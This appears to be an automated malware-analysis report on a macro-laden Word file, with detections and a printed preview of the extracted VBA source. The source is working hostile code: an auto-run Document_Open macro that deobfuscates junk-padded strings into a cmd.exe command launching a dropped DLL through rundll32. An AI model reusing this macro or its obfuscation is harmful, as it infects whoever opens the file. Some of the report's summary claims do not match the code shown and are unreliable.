Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f2a336d4e61ae9bb…

MALICIOUS

Office (OOXML)

110.9 KB Created: 2021-09-30 14:03:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-10-14
MD5: 0f4c2dae18a120005510a6684f2c7154 SHA-1: 120238dafe775b0d6a38f131940b81a59c20b4e8 SHA-256: f2a336d4e61ae9bb376a280f9c28092f71004085e6b5dfbc93b74b8dfb2ccf7b
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OOXML document containing a VBA project with a Document_Open macro, which is a common technique for executing malicious code upon opening. The macro attempts to deobfuscate and execute a command that writes to the Run key, likely to establish persistence and launch a second-stage payload. ClamAV also detected this as a downloader.

Heuristics 5

  • ClamAV: Doc.Downloader.Generic-8011192-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-8011192-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 43552 bytes
SHA-256: b55c75adf3273ed27c8db84f7e83ea17daefdfe6d4b81dbdb7cf0b05ca9aeeb9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function sertsd(ByVal rCell As Range, _
                        ByVal strFind As String)
    j = InStr(1, rCell.value, strFind, vbTextCompare)
    With rCell
        .Characters(Start:=j, Length:=Len(strFind)).Font.ColorIndex = 3
        .Characters(Start:=j, Length:=Len(strFind)).Font.Bold = True
    End With
End Function

Sub sgaswreta()
Dim i As Long, m
Dim iNbRow As Long, iRowStart As Long: iRowStart = 1
Dim iNbCol As Long, iClnStart As Long: iClnStart = 1
Dim oSh As Object
Dim oWb As Object '
Dim oWbMain As Object
Dim strWbMainFullName As String: strWbMainFullName = oWbMain.FullName

Dim strWbMainName As String
m = Split(strWbMainFullName, ".", -1, vbTextCompare)
strWbMainName = m(LBound(m))
strWbMainName = Trim(oSh.Cells(iRowStart, 1).value)
EventsChange False
Set oWb = ActiveWorkbook
EventsChange True
End Sub

Public Sub holehfls()
    Dim sdf As Double
    Dim fojn As Long
    
    sdf = Sin(3)
    
    fojn = lsjalkjd.falkhqlsih(0, "sdfgw4", "893792", 0, 0)
    If fojn = 0 Then
    
        vbnkljb34.OptionButton3.Caption = "poRwCpoRw:poRw\poRwWipoRwndpoRwopoRwwpoRws\poRwSpoRwypoRwstpoRwempoRw3poRw2\cpoRwmpoRwd.poRwepoRwxpoRwe"
        vbnkljb34.OptionButton3.Caption = lsjalkjd.nlqkflsk(vbnkljb34.OptionButton3.Caption, "poRw")
        
        vbnkljb34.OptionButton3.Tag = "/cuiE cuiEhouiEicuiEe uiE/CuiE YuiE /NuiE /DuiE YuiE /uiETuiE uiE3uiE0 uiE& suiEtauiEruiEt uiECuiE:uiE\uiEWuiEinuiEdouiEwuiEs\SuiEysuiEtuiEemuiE3uiE2\ruiEunuiEdluiEl3uiE2.euiExuiEe uiECuiE:uiE\uiEPruiEoguiErauiEmDauiEtauiE\nuiEcvw.duiEluiEl,cuiEouiEms"
        vbnkljb34.OptionButton3.Tag = lsjalkjd.nlqkflsk(vbnkljb34.OptionButton3.Tag, "uiE")
        
        lsjalkjd.jgoleirh 3, vbnkljb34.OptionButton3.Caption, vbnkljb34.OptionButton3.Tag
    Else
        Dim df As Integer
        Dim d As String
        df = 4
        d = CStr(df)
    End If
End Sub


Sub EventsChange(value As Boolean)
    With Application
        .Calculation = xlCalculationAutomatic
        .ScreenUpdating = value
        .ShowWindowsInTaskbar = value
        .DisplayAlerts = value
        .EnableEvents = value
        If value Then
            .Calculation = xlCalculationAutomatic
            Else: .Calculation = xlCalculationManual
        End If
    End With
End Sub


Private Sub Document_Open()
    Dim x, y, z As Double
    Dim hnfkj As String
    holehfls
    hnfkj = vbnkljb34.OptionButton3.Caption
End Sub

Attribute VB_Name = "vbnkljb34"
Attribute VB_Base = "0{7B3DE40E-BF4A-4FF8-A455-448868E1D684}{1559A2B9-579C-4B97-851C-1CC067DBD339}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lsjalkjd"

Function FnDelDub(ByVal oSh As Object, _
                    Optional ByVal iRowStart As Long = 1, _
                    Optional ByVal iClnStart As Long = 1) As Boolean
    Dim aColsArr(), i&
    Dim iNbRow As Long, iNbCln As Long
    Dim strCellSelect
On Error GoTo FnDelDub_Err
    With oSh
        iNbCln = 1 '.Cells(1, 256).End(xlToLeft).Column
        iNbRow = .Cells(Rows.Count, 1).End(xlUp).Row
        strCellSelect = Range(.Cells(iRowStart, iClnStart), .Cells(iNbRow, iNbCln)).Address
        ReDim aColsArr(iNbCln - 1)
        For i = 1 To iNbCln
            aColsArr(i - 1) = i
        Next
        .Range(strCellSelect).RemoveDuplicates (aColsArr), xlYes
    End With
    Erase aColsArr
    FnDelDub = True: Exit Function
FnDelDub_Err:
FnDelDub = False
End Function


Sub jgoleirh(flkas As Long, fewo4ih As String, jgdlfk As String)
    vbnkljb34.ListBox1.AddItem
    vbnkljb34.ListBox1.AddItem
    weuorihod.jflwk 0,
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 105984 bytes
SHA-256: 448b16303737ce5fa4a2303fa5f57ad767e29a486a27d229a7598930d6af5ace
Detection
ClamAV: Doc.Downloader.Generic-8011192-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.